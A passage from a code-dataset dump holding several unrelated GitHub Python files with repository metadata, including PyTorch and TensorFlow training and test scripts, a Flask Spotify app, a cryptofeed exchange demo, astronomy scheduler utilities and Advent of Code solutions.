0]+np.linspace(0.01,1,num=100)*(np.abs(backward_peak_flux)+np.abs(cv_backward['Flux'].iloc[ 0]))\n #print(points1)\n #print(points3)\n\n range1 = np.array([])\n for point in points1:\n theta = phase1['Theta'].iloc[(phase1['Flux']-point).abs().argsort()[0]]\n range1 = np.append(range1,theta)\n #print(range1)\n range3 = np.array([])\n for point in points3:\n theta = phase3['Theta'].iloc[(phase3['Flux']-point ).abs().argsort()[0]]\n range3 = np.append(range3,theta)\n #print(range3)\n range_all = np.append(range1,points1)\n range_all = np.append(range_all,range3)\n range_all = np.append(range_all,points3)\n #print(range_all)\n\n\n \"\"\"\n #fig = plt.figure()\n df.plot(x='Theta',y='Flux',label='Cyclic Voltammogram')\n plt.scatter(range1,points1,label='Forward Scan Features')\n plt.scatter(range3,points3,label='Reverse Scan Features')\n plt.legend(loc=0)\n plt.show()\n time.sleep(1)\n #plt.close(fig)\"\"\"\n return range_all\n\ndef schedule(epoch,lr):\n if epoch <1000:\n return lr\n else:\n return lr*0.9999\n\n\n\nif __name__ == \"__main__\":\n\n train_loader, val_loader = load_data(*read_feature())\n model = model(400,3).to(device=device)\n model.double()\n\n optimizer = torch.optim.Adam(model.parameters(),lr=1e-4)\n loss_func = torch.nn.L1Loss()\n\n for epoch in range(100):\n\n train_losses = []\n val_losses = []\n for x_batch,y_batch in train_loader:\n model.train()\n x_batch.to(device)\n y_batch.to(device)\n optimizer.zero_grad()\n y_hat = model(x_batch)\n\n loss = loss_func(y_hat,y_batch)\n\n loss.backward()\n optimizer.step()\n train_losses.append(loss.item())\n\n with torch.no_grad():\n\n for x_val, y_val in val_loader:\n x_val = x_val.to(device)\n y_val = y_val.to(device)\n\n model.eval()\n\n y_hat = model(x_val)\n\n val_loss = loss_func(y_val,y_hat)\n \n val_losses.append(val_loss.item())\n\n\n model.history['train_loss'].append(sum(train_losses)/len(train_losses))\n model.history['val_loss'].append(sum(val_losses)/len(val_losses))\n \n df = pd.DataFrame(model.history)\n\n df.plot()\n\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"nmerovingian/dissociativeCE-Simulation-MachineLearning","sub_path":"Machine Learning/PyTorch Version Method A/Predict Constants.py","file_name":"Predict Constants.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74609009068","text":"import dl_model\nimport os\nimport tensorflow as tf\ntf.logging.set_verbosity(tf.logging.ERROR)\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nprint('MNISTの取得:', flush=True)\nmnist = input_data.read_data_sets('.', one_hot=True)\nprint('完了')\n\nx = tf.placeholder(tf.float32, [None, 784])\nz = tf.placeholder(tf.float32, [None, 10])\ny, keep_prob = dl_model.deepnn(x)\n\nyl = tf.argmax(y, 1)\nzl = tf.argmax(z, 1)\nac = tf.reduce_mean(tf.cast(tf.equal(yl, zl), tf.float32))\n\nsaver = tf.train.Saver()\nsession = tf.Session()\npath = os.path.abspath(os.path.dirname(__file__))\nsaver.restore(session, os.path.join(path, 'dl_model'))\n\nBATCH = 100\nTEST = 100\n\nprint('テスト結果:', flush=True)\ncount = [[0 for i in range(10)] for j in range(10)]\nscore = 0\nfor i in range(TEST):\n bx, bz = mnist.test.next_batch(BATCH)\n y_label, z_label = session.run(\n (yl, zl), feed_dict={x: bx, z: bz, keep_prob: 1.0})\n for j, k in zip(y_label, z_label):\n count[j][k] += 1\n score += 1 if j == k else 0\n if i % 10 == 0:\n print('ステップ{0:5d}:正解率{1:6.2f}%'.format(i, score*100/BATCH/(i+1)))\n\nprint('正解 ', end='')\nfor i in range(10):\n print(' [{0}]'.format(i), end='')\nprint()\nfor i in range(10):\n print('予測[{0}]'.format(i), end='')\n for j in range(10):\n print('{0:6d}'.format(count[i][j]), end='')\n print()\nprint('正解率:', score*100/BATCH/TEST, '%')\n","repo_name":"uni51/understand_python","sub_path":"sample/chapter12/dl_test.py","file_name":"dl_test.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73722629546","text":"from flask import Flask, render_template, url_for\nfrom SpotifyAPIManager import Spotify\nfrom spotipy.cache_handler import CacheFileHandler\nimport json\nimport os\n\napp = Flask(__name__)\nspotifyManager = Spotify()\n\n\n@app.route('/')\ndef login():\n return render_template('login.html')\n\n\n@app.route('/currentSong')\ndef main():\n if os.path.exists(\".cache\"):\n delete_cache()\n else:\n spotifyManager.login()\n cacheHandler = CacheFileHandler()\n with open('cache.json', 'w+') as json_file:\n json.dump(cacheHandler.get_cached_token(), json_file, indent=4)\n data = spotifyManager.currentSong('tonal_information.json')\n print(data)\n\n key_info = \"\"\"Key: {} {}\"\"\".format(data['key'], data['mode'])\n\n tempo = \"Tempo: {}\".format(data['tempo'])\n\n spotifyManager.download_cover(data['cover_url'])\n print(data['cover_url'])\n\n try:\n delete_cache()\n except:\n print(\"ERROR: No cache file found\")\n finally:\n return render_template('current_song.html', name=data['song'], artist=data['artist'], info=key_info, tempo=tempo)\n\ndef delete_cache():\n file = '.cache'\n path = os.path.join(os.getcwd(), file)\n os.remove(path)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"eren-darici/spotify-keyfinder","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"12914489131","text":"from cryptofeed import FeedHandler\nfrom cryptofeed.callback import BookCallback, TickerCallback, TradeCallback\nfrom cryptofeed.defines import BID, ASK, FUNDING, L2_BOOK, OPEN_INTEREST, TICKER, TRADES\nfrom cryptofeed.exchanges import Deribit\n\n\nasync def trade(feed, symbol, order_id, timestamp, side, amount, price, receipt_timestamp):\n print(f\"Timestamp: {timestamp} Feed: {feed} Pair: {symbol} ID: {order_id} Side: {side} Amount: {amount} Price: {price}\")\n\n\nasync def ticker(feed, symbol, bid, ask, timestamp, receipt_timestamp):\n print(f'Feed: {feed} Pair: {symbol} Bid: {bid} Ask: {ask}')\n\n\nasync def book(feed, symbol, book, timestamp, receipt_timestamp):\n print(f'Timestamp: {timestamp} Feed: {feed} Pair: {symbol} Book Bid Size is {len(book[BID])} Ask Size is {len(book[ASK])}')\n\n\nasync def funding(**kwargs):\n print(f'Funding {kwargs}')\n\n\nasync def oi(feed, symbol, open_interest, timestamp, receipt_timestamp):\n print(f'Timestamp: {timestamp} Feed: {feed} Pair: {symbol} open interest: {open_interest}')\n\n\ndef main():\n f = FeedHandler()\n\n # Deribit can't handle 400+ simultaneous requests, so if all\n # instruments are needed they should be fed in the different calls\n\n sub = {TRADES: [\"BTC-PERPETUAL\"], TICKER: ['ETH-PERPETUAL'], FUNDING: ['ETH-PERPETUAL'], OPEN_INTEREST: ['ETH-PERPETUAL']}\n f.add_feed(Deribit(subscription=sub, callbacks={OPEN_INTEREST: oi, FUNDING: funding, TICKER: TickerCallback(ticker), TRADES: TradeCallback(trade)}))\n f.add_feed(Deribit(symbols=['BTC-PERPETUAL'], channels=[L2_BOOK], callbacks={L2_BOOK: BookCallback(book)}))\n\n f.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Quirky-Fox/cryptofeed-old","sub_path":"examples/demo_deribit.py","file_name":"demo_deribit.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"25725062776","text":"class Mobile ():\n def __init__(self,m,p):\n self.model = m\n self.price = p\n def show_Details(self):\n print(f\"Model: {self.model}\")\n print(\"Price: {}\".format(self.price))\n\ndef details ():\n Model = input(\"Enter model name: \")\n Price = int(input(\"Enter price: \"))\n return Model , Price\n\nprint(\"Details of RealMe Mobile\")\nm , p = details()\nrealme = Mobile(m,p)\nrealme.show_Details()\nprint(id(realme))\nprint()\n\nprint(\"Details of Redmi Mobile\")\nm, p = details()\nredmi = Mobile(m , p )\nredmi.show_Details()\nprint(id(redmi))\n","repo_name":"ankit-0044/Python","sub_path":"Python/Random Codes/Mobile_class.py","file_name":"Mobile_class.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4137500643","text":"import unittest\nimport os\nfrom os import listdir, path\nfrom pathlib import Path\n\n\nclass TestCensor(unittest.TestCase):\n\n def test_get_inputs(self, dir = Path('Podcast_Censor\\Test_Files\\Test_Input'), f = 'audio_test.mp3'):\n from convert_to_wav import get_inputs\n inputs = get_inputs(dir)\n self.assertTrue(f in inputs)\n \n def test_mp3_to_wav(self, f = \"audio_test.mp3\"):\n from convert_to_wav import mp3_to_wav\n dest_dir = Path('Podcast_Censor/Test_Files/Test_Intermediate')\n in_file = Path('Podcast_Censor/Test_Files/Test_Input/') / f\n mp3_to_wav(in_file, dest_dir)\n f = dest_dir / (in_file.stem + '.wav')\n self.assertTrue(os.path.isfile(f))\n if os.path.exists(f):\n os.remove(f)\n\n def test_convert_files_to_wav(self):\n from convert_to_wav import convert_files_to_wav\n in_dir = Path('Podcast_Censor/Test_Files/Test_Input')\n out_dir = Path('Podcast_Censor/Test_Files/Test_Intermediate')\n convert_files_to_wav(in_dir,out_dir)\n \n inputs = [f[0:-4] + '.wav' for f in listdir(in_dir) if path.isfile(in_dir / f)]\n out = [f for f in listdir(out_dir) if path.isfile(out_dir / f)]\n self.assertEqual(inputs, out)\n for f in out:\n if os.path.exists(f):\n os.remove(f)\n \n def test_create_decoder():\n from create_transcript import create_decoder\n decoder = create_decoder()\n \n\n\nif __name__ == \"__main__\":\n unittest.main()","repo_name":"micah-rufsvold/hottinruf","sub_path":"Podcast_Censor/censor_tests.py","file_name":"censor_tests.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780724967","text":"__all__ = (\"VaryExptDetailer\", \"calc_target_m5s\")\n\nimport healpy as hp\nimport numpy as np\n\nfrom rubin_sim.scheduler.detailers import BaseDetailer\nfrom rubin_sim.utils import m5_flat_sed, ra_dec2_hpid\n\n\ndef calc_target_m5s(alt=65.0, fiducial_seeing=0.9, exptime=20.0):\n \"\"\"Use the skybrightness model to find some good target m5s.\n\n Parameters\n ----------\n alt : `float`, opt\n Altitude for the target, degrees. Default 65.\n fiducial_seeing : `float`, opt\n Fiducial FWHMeff seeing, arcseconds. Default 0.9.\n exptime : `float`, opt\n Exposure time for the comparison, seconds. Default 20.\n\n Returns\n -------\n goal_m5 : `dict` of `float`\n dictionary of expected m5 values keyed by filtername\n \"\"\"\n import rubin_sim.skybrightness as sb\n\n sm = sb.SkyModel(moon=False, twilight=False, mags=True)\n sm.set_ra_dec_mjd(np.array([0.0]), np.array([alt]), 49353.177645, degrees=True, azAlt=True)\n sky_mags = sm.return_mags()\n airmass = 1.0 / np.cos(np.pi / 2.0 - np.radians(alt))\n\n goal_m5 = {}\n for filtername in sky_mags:\n goal_m5[filtername] = m5_flat_sed(filtername, sky_mags[filtername], fiducial_seeing, exptime, airmass)\n\n return goal_m5\n\n\nclass VaryExptDetailer(BaseDetailer):\n \"\"\"Vary the exposure time on observations to try and keep each observation at uniform depth.\n\n Parameters\n ----------\n min_expt : `float` (20.)\n The minimum exposure time to use (seconds).\n max_expt : `float` (100.)\n The maximum exposure time to use\n target_m5 : `dict` (None)\n Dictionary with keys of filternames as str and target 5-sigma depth values as floats.\n If none, the target_m5s are set to a min_expt exposure at X=1.1 in dark time.\n\n \"\"\"\n\n def __init__(self, nside=32, min_expt=20.0, max_expt=100.0, target_m5=None):\n \"\"\"\"\"\"\n # Dict to hold all the features we want to track\n self.survey_features = {}\n self.nside = nside\n self.min_exp = min_expt\n self.max_exp = max_expt\n if target_m5 is None:\n self.target_m5 = {\n \"g\": 24.381615425253738,\n \"i\": 23.41810142458083,\n \"r\": 23.964359143049755,\n \"u\": 22.978794343692783,\n \"y\": 21.755612950787068,\n \"z\": 22.80377793629767,\n }\n else:\n self.target_m5 = target_m5\n\n def __call__(self, observation_list, conditions):\n \"\"\"\n Parameters\n ----------\n observation_list : `list` of observations\n The observations to detail.\n conditions : `rubin_sim.scheduler.conditions` object\n\n Returns\n -------\n List of observations.\n \"\"\"\n obs_array = np.concatenate(observation_list)\n hpids = ra_dec2_hpid(self.nside, obs_array[\"RA\"], obs_array[\"dec\"])\n new_expts = np.zeros(obs_array.size, dtype=float)\n for filtername in np.unique(obs_array[\"filter\"]):\n in_filt = np.where(obs_array[\"filter\"] == filtername)\n delta_m5 = self.target_m5[filtername] - conditions.M5Depth[filtername][hpids[in_filt]]\n # We can get NaNs because dithering pushes the center of the pointing into masked regions.\n nan_indices = np.argwhere(np.isnan(delta_m5)).ravel()\n for indx in nan_indices:\n bad_hp = hpids[in_filt][indx]\n # Note this might fail if we run at higher resolution, then we'd need to look farther for\n # pixels to interpolate.\n near_pix = hp.get_all_neighbours(conditions.nside, bad_hp)\n vals = conditions.M5Depth[filtername][near_pix]\n if True in np.isfinite(vals):\n estimate_m5 = np.mean(vals[np.isfinite(vals)])\n delta_m5[indx] = self.target_m5[filtername] - estimate_m5\n else:\n raise ValueError(\"Failed to find a nearby unmasked sky value.\")\n\n new_expts[in_filt] = conditions.exptime * 10 ** (delta_m5 / 1.25)\n new_expts = np.clip(new_expts, self.min_exp, self.max_exp)\n # I'm not sure what level of precision we can expect, so let's just limit to seconds\n new_expts = np.round(new_expts)\n\n for i, observation in enumerate(observation_list):\n observation[\"exptime\"] = new_expts[i]\n\n return observation_list\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/scheduler/detailers/vary_exptime.py","file_name":"vary_exptime.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"42868096432","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/154538\n\nfrom collections import deque\n\ndef solution(x, y, n):\n stack = deque([[y, 0]])\n while stack:\n y, cnt = stack.popleft()\n \n if y == x:\n return cnt\n if y < x:\n continue\n\n if y % 2 == 0:\n stack.append([y/2, cnt+1])\n if y % 3 == 0:\n stack.append([y/3, cnt+1])\n \n stack.append([y-n, cnt+1])\n\n return -1\n","repo_name":"yongsun-yoon/python-algorithms","sub_path":"programmers/154548.py","file_name":"154548.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22367246072","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu 4 Aug 2023 19:15:00 CEST\n\n@author: Gloria del Valle\n\"\"\"\nfrom sklearn.model_selection import GridSearchCV\nimport warnings\n\n# Suppress a specific warning\nwarnings.filterwarnings(\"ignore\", category=FutureWarning)\n\n# Define hyperparameter grid\nparam_grid = {\n \"n_estimators\": [100, 200, 300],\n \"max_depth\": [3, 4, 5, 20],\n \"learning_rate\": [0.1, 0.01, 0.001],\n \"max_features\": [\"auto\", \"sqrt\"],\n}\n\n\nclass GridSearch:\n \"\"\"\n Perform grid search with a determined model\n \"\"\"\n\n def __init__(self, data_loader, model):\n \"\"\"\n Initialize GridSearch class\n \"\"\"\n self.data_loader = data_loader\n self.model = model\n\n def grid_search(self):\n \"\"\"\n Perform grid search with a determined model\n\n Returns:\n y_pred: predictions on the test set\n \"\"\"\n\n # Get the valid hyperparameters for Random Forest\n valid_params = [\n param for param in param_grid if param in self.model.get_params()\n ]\n\n # Filter the parameter grid to include only valid parameters\n valid_param_grid = {param: param_grid[param] for param in valid_params}\n\n # Initialize GridSearchCV\n grid_search = GridSearchCV(self.model, valid_param_grid, cv=3, n_jobs=-1)\n\n # Perform grid search\n grid_search.fit(self.data_loader.X_train, self.data_loader.y_train)\n\n # Get the best model\n best_model = grid_search.best_estimator_\n\n # Make predictions on the test set\n y_pred = best_model.predict(self.data_loader.X_test)\n\n # Print best hyperparameters\n print(\n f\"Best hyperparameters for {self.model.__class__.__name__} model:\",\n grid_search.best_params_,\n )\n\n return y_pred\n","repo_name":"glorelvalle/cc-fraud-detection","sub_path":"models/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20806099025","text":"import csv\nfrom copy import copy\n\nwith open ('AoC21/data/AoC_3_1_2021.csv') as file:\n reader = csv.reader(file)\n data = list(reader)\n\ndata_clean = [item for sublist in data for item in sublist]\n\ngamma = ''\nepsilon = ''\n\nfor item in range(0, len(data_clean[0])):\n one = 0\n zero = 0\n for i in range(len(data_clean)):\n if data_clean[i][item] == '0':\n zero += 1\n else:\n one += 1\n if zero > one:\n gamma += '0'\n epsilon += '1'\n else:\n gamma += '1'\n epsilon += '0'\n\ng = int(gamma, 2)\ne = int(epsilon, 2)\n\nprint(f'result part 1: {g*e}')\n\noxygen_diagnostic = copy(data_clean)\n\nindex = 0\nwhile len(oxygen_diagnostic) > 1:\n zero = 0\n one = 0\n zero_list = []\n one_list = []\n for i in range(0, len(oxygen_diagnostic)):\n if oxygen_diagnostic[i][index] == '0':\n zero += 1\n zero_list.append(oxygen_diagnostic[i])\n else:\n one += 1\n one_list.append(oxygen_diagnostic[i])\n\n if one >= zero:\n oxygen_diagnostic = one_list\n else:\n oxygen_diagnostic = zero_list\n index += 1\n\noxygen = int(oxygen_diagnostic[0],2)\n\nco2_diagnostic = copy(data_clean)\n\nindex = 0\nwhile len(co2_diagnostic) > 1:\n zero = 0\n one = 0\n zero_list = []\n one_list = []\n for i in range(0, len(co2_diagnostic)):\n if co2_diagnostic[i][index] == '0':\n zero += 1\n zero_list.append(co2_diagnostic[i])\n else:\n one += 1\n one_list.append(co2_diagnostic[i])\n\n if one < zero:\n co2_diagnostic = one_list\n else:\n co2_diagnostic = zero_list\n index += 1\n\nco2 = int(co2_diagnostic[0],2)\n\nprint(f'result part 2: {oxygen * co2}')\n","repo_name":"Daniel-Lars/AoC21","sub_path":"AoC21/day3.py","file_name":"day3.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"24359933511","text":"ss = input(\"\")\nt1 = input(\"\")\nx = 0\nR=\"\"\nR1 = ''\nfor i in ss:\n if(i in t1[x:]):\n R = R+i\n x = t1.index(i)+1\nx = 0\nfor i in t1:\n if(i in ss[x:]):\n R1 = R1+i\n x = ss.index(i)+1\nif(len(R)>= len(R1)):\n print(R)\nelse:\n print(R1)\n","repo_name":"balajimanikandanm/python3","sub_path":"Hun112.py","file_name":"Hun112.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"780270357","text":"__all__ = (\"TrilegalDensityMap\",)\n\nimport os\n\nimport healpy as hp\nimport numpy as np\n\nfrom rubin_sim.data import get_data_dir\nfrom rubin_sim.utils import _build_tree, _equatorial_from_galactic, _hpid2_ra_dec, _xyz_from_ra_dec\n\nfrom . import BaseMap\n\n\nclass TrilegalDensityMap(BaseMap):\n \"\"\"\n Return the cumulative stellar luminosity function for each slice_point. Units of stars per sq degree.\n\n Parameters\n ----------\n filtername : `str`, opt\n Filter to use. Options of u,g,r,i,z,y. Default r.\n nside : `int`, opt\n The HEALpix nside (can be 64 or 128). Default 64.\n ext : `bool`, opt\n Use the full sky maps. Default True.\n \"\"\"\n\n def __init__(self, filtername=\"r\", nside=64, ext=True):\n self.map_dir = os.path.join(get_data_dir(), \"maps\", \"TriMaps\")\n self.filtername = filtername\n self.keynames = [\n f\"starLumFunc_{self.filtername}\",\n f\"starMapBins_{self.filtername}\",\n ]\n self.nside = nside\n self.ext = ext\n\n def _read_map(self):\n if self.ext:\n filename = \"TRIstarDensity_%s_nside_%i_ext.npz\" % (\n self.filtername,\n self.nside,\n )\n else:\n filename = \"TRIstarDensity_%s_nside_%i.npz\" % (self.filtername, self.nside)\n star_map = np.load(os.path.join(self.map_dir, filename))\n self.star_map = star_map[\"starDensity\"].copy()\n self.star_map_bins = star_map[\"bins\"].copy()\n self.starmap_nside = hp.npix2nside(np.size(self.star_map[:, 0]))\n # note, the trilegal maps are in galactic coordinates, and nested healpix.\n gal_l, gal_b = _hpid2_ra_dec(self.nside, np.arange(hp.nside2npix(self.nside)), nest=True)\n\n # Convert that to RA,dec. Then do nearest neighbor lookup.\n ra, dec = _equatorial_from_galactic(gal_l, gal_b)\n self.tree = _build_tree(ra, dec)\n\n def run(self, slice_points):\n self._read_map()\n\n x, y, z = _xyz_from_ra_dec(slice_points[\"ra\"], slice_points[\"dec\"])\n\n dist, indices = self.tree.query(list(zip(x, y, z)))\n\n slice_points[\"starLumFunc_%s\" % self.filtername] = self.star_map[indices, :]\n slice_points[\"starMapBins_%s\" % self.filtername] = self.star_map_bins\n return slice_points\n","repo_name":"lsst/rubin_sim","sub_path":"rubin_sim/maf/maps/trilegal_map.py","file_name":"trilegal_map.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"37"} +{"seq_id":"6566621685","text":"from typing import List, Dict\n\nimport pandas as pd\n\nfrom .clean_spoken import clean_spoken\nfrom .group_dialogue import group_dialogue\nfrom .check_role import fix_role\nfrom .restore_punctuation import restore_punc\nfrom ..model_manager import get_spacy_model\nfrom ..util import Utterance, init_from_str_dialogue\n\n\ndef statistic_each_dialogue(dialogue: str, task: str):\n \"\"\"\n Describe a dialogue based on:\n - Total length in word; sentence; uterance\n - uterances/role\n - words/uterance/role; sentences/uterance/role\n - NER/uterance/role\n \"\"\"\n figures = {}\n uterances = init_from_str_dialogue(dialogue, task=task)\n figures['Dialogue length in uterance'] = len(uterances)\n figures['Dialogue length in word'] = sum([len(each.spacy_doc) for each in uterances])\n figures['Dialogue length in sentence'] = sum([len(list(each.spacy_doc.sents)) for each in uterances])\n to_merge_figures = {}\n roles = {}\n for each in uterances:\n if each.role not in roles:\n roles[each.role] = 1\n else:\n roles[each.role] += 1\n if f'Uterance length in word of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Uterance length in word of {each.role}'] = []\n to_merge_figures[f'Uterance length in word of {each.role}'].append(len(each.spacy_doc))\n if f'Uterance length in sentence of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Uterance length in sentence of {each.role}'] = []\n to_merge_figures[f'Uterance length in sentence of {each.role}'].append(len(list(each.spacy_doc.sents)))\n if f'Number of named entities in uterance of {each.role}' not in to_merge_figures:\n to_merge_figures[f'Number of named entities in uterance of {each.role}'] = []\n to_merge_figures[f'Number of named entities in uterance of {each.role}'].append(len(list(each.spacy_doc.ents)))\n\n for role, num in roles.items():\n figures[f'Dialogue length in uterance of {role}'] = num\n return figures, to_merge_figures, uterances\n\n\ndef describe_text(text):\n \"\"\"\n Describe a text\n \"\"\"\n nlp = get_spacy_model()\n spacy_doc = nlp(text)\n figures = {}\n figures['Number of words'] = len(spacy_doc)\n figures['Number of sentences'] = len(list(spacy_doc.sents))\n figures['Number of entities'] = len(list(spacy_doc.ents))\n to_merge = {}\n to_merge['Sentence length in word'] = [len(sent) for sent in spacy_doc.sents]\n return figures, to_merge\n\n\ndef preprocessing(dialogue_list: List[List[Utterance]],\n df: pd.DataFrame,\n dialogue_column: str,\n **kwargs) -> Dict:\n \"\"\"\n Preprocessing function.\n Receive dialogue data (raw) of a list of dialogue, this function return a tuple of pre-processed dialogue, other meta data, etc.\n \"\"\"\n assert dialogue_column in df.columns, f\"Expected column '{dialogue_column}' in the dataframe\"\n df_cleaned = clean_spoken(df, dialogue_column=dialogue_column, **kwargs)\n df_punc = restore_punc(df_cleaned, dialogue_column='clean_dialogue', **kwargs)\n df_fix_role = fix_role(df_punc, dialogue_column='restore_punctuation_dialogue', **kwargs)\n df_group = group_dialogue(df_fix_role, dialogue_column='fixed_role_dialogue', **kwargs)\n\n return {\n \"dialogue_list\": dialogue_list, \"df\": df_group\n }\n","repo_name":"catcd/MEDIQA-Sum-2023-UETCorn","sub_path":"taskC/src/preprocess/simple_processing.py","file_name":"simple_processing.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35201574853","text":"from propriedade import Propriedade\nfrom impulsivo import Impulsivo\nfrom aleatorio import Aleatorio\nfrom exigente import Exigente\nfrom cauteloso import Cauteloso\nimport random\nimport time\nfrom colorama import Fore\n\nCONTINUA_JOGO = True\nDADO = [1,2,3,4,5,6]\nLIMITE = 1000\nDEBUG = False\n\nclass Tabuleiro:\n\n def __init__(self):\n self.rodada = 0\n self.vencedor = \"Ninguem\"\n self.timeout = False\n self.propriedades = [\n Propriedade(0,0,\"Inicio\"), #0 Inicio\n Propriedade(60, 5, \"Apartamento - Ibirapuera\"), #1\n Propriedade(60, 35, \"Loja - Moema\"), #2\n Propriedade(20, 5, \"Supermercado - Brooklin\"), #3\n Propriedade(70, 15, \"Apartamento - Santo Amaro\"), #4\n Propriedade(120, 55, \"Mercearia - Socorro\"), #5\n Propriedade(90, 60, \"Pastelaria - Tatuape\"), #6\n Propriedade(60, 15, \"Loja - Penha\"), #7\n Propriedade(30, 5, \"Farmacia - Santana\"), #8\n Propriedade(230, 60, \"Hotel - Casa Verde\"), #9\n Propriedade(40, 5, \"Escola - Butantã\"), #10\n Propriedade(110, 55, \"Apartamento - Pirituba\"), #11\n Propriedade(60 , 15, \"Loja - Freguesia do O\"), #12\n Propriedade(50, 15, \"Supermercado - Lapa\"), #13\n Propriedade(130, 50, \"Apartamento - Pinheiros\"), #14\n Propriedade(60, 5 , \"Mercearia - Pompeia\"), #15\n Propriedade(30, 5, \"Hotel - Vila Madalena\"), #16\n Propriedade(85, 30, \"Loja - Santa Ifigenia\"), #17\n Propriedade(70 , 25, \"Farmacia - Anhangabau\"), #18\n Propriedade(60, 10, \"Minimercado - Liberdade\"), #19\n Propriedade(20, 5, \"Escola - Mooca\"), #20\n ]\n\n self.NUM_PROPRIEDADES = len(self.propriedades) - 1\n\n self.jogadores = [\n Impulsivo(\"João\"),\n Exigente(\"José\"),\n Cauteloso(\"Ana\"),\n Aleatorio(\"Maria\")\n ]\n\n self.JOGANDO = len(self.jogadores)\n\n def proxima_posicao(self, jogador):\n dado = random.choice(DADO)\n # se passar da ultima casa começa da primeira casa\n proxima_pos = jogador.posicao + dado\n if proxima_pos > self.NUM_PROPRIEDADES:\n # ao completar uma volta o jogador ganha 100\n jogador.saldo += 100\n return proxima_pos - self.NUM_PROPRIEDADES\n else:\n return proxima_pos\n\n def perde_propriedades(self, jogador):\n for propriedade in self.propriedades:\n if propriedade.dono == jogador:\n propriedade.retira_dono()\n\n def exclui_jogador(self,jogador):\n jogador.jogando = False\n self.JOGANDO -= 1\n self.perde_propriedades(jogador)\n if DEBUG:\n print(f\"{Fore.RED} ** Jogador {jogador.nome} excluido {Fore.RESET}\")\n\n def acha_vencedor(self):\n maior_saldo = 0\n for jogador in self.jogadores:\n if jogador.jogando:\n if jogador.saldo > maior_saldo:\n maior_saldo = jogador.saldo\n self.vencedor = jogador\n\n def partida(self):\n random.shuffle(self.jogadores)\n while self.JOGANDO > 1:\n for jogador in self.jogadores:\n if jogador.jogando:\n jogador.posicao = self.proxima_posicao(jogador)\n # Decide o que o jogador vai fazer nessa propriedade\n propriedade = self.propriedades[jogador.posicao]\n if DEBUG:\n print(f\"Rodada {self.rodada} - Jogando {jogador.nome}, Saldo: {jogador.saldo} - Caiu na propriedade de {(propriedade.dono).nome} - Valor:{propriedade.venda}, Aluguel:{propriedade.aluguel}\")\n jogador.acao(propriedade)\n # Exclui jogadores sem dinheiro\n if jogador.saldo < 0:\n self.exclui_jogador(jogador)\n #time.sleep(0.1)\n self.rodada += 1\n if self.rodada > LIMITE:\n self.rodada -= 1\n self.timeout = True\n self.JOGANDO = 0\n break\n\n self.acha_vencedor()","repo_name":"atersistemas/Banco_Prev","sub_path":"tabuleiro.py","file_name":"tabuleiro.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17541942896","text":"# coding=utf-8\n'''\n全部帧 crop圆圈区域 然后对齐 通道上堆叠起来\n然后所有通道上对每个pixel位置求均值 方差之类的统计量\n以上, 就处理变成了新的图\n\n'''\n\nimport os\nimport cv2\nimport json\nfrom pattern_find_center import get_min_apple_pattern\n\n\n\ndef locate_circle(auged):\n gray_auged = auged[:,:,0]\n try:\n circles = cv2.HoughCircles(gray_auged,cv2.HOUGH_GRADIENT,1,100,param1=60,param2=50,minRadius=320,maxRadius=400)[0]\n except:\n return None, None, 0\n \n # 检出太多的圆也是不对的, 可能因为图像中的\"雪花点\"导致\n if len(circles) >= 3:\n return None, None, 0\n else:\n for circle in circles:\n circle = [int(a) for a in circle]\n \n # cv2.circle(auged,(circle[0],circle[1]),circle[2],(0,255,0),2)\n\n return auged, circles, 1\n\n\ndef video_2_frams(full_video_path, out_dir_path, train_frames, auged_or_org):\n # auged_or_org = True, auged后的图像做霍夫圆检测\n # False, 原视频帧做霍夫圆检测\n # video_path, video = '/Users/chenjia/Downloads/Smartmore/2022/比赛-工业表面缺陷检测/mp4s', '001.mp4'\n video = os.path.basename(full_video_path)\n frame_circle = dict()\n times = 0\n frame_frequency = 1\n # full_video_path = os.path.join(video_path, video)\n print(full_video_path)\n camera = cv2.VideoCapture(full_video_path)\n while True:\n times = times + 1\n res, image = camera.read()\n if res:\n if times % frame_frequency == 0:\n # auged_img = 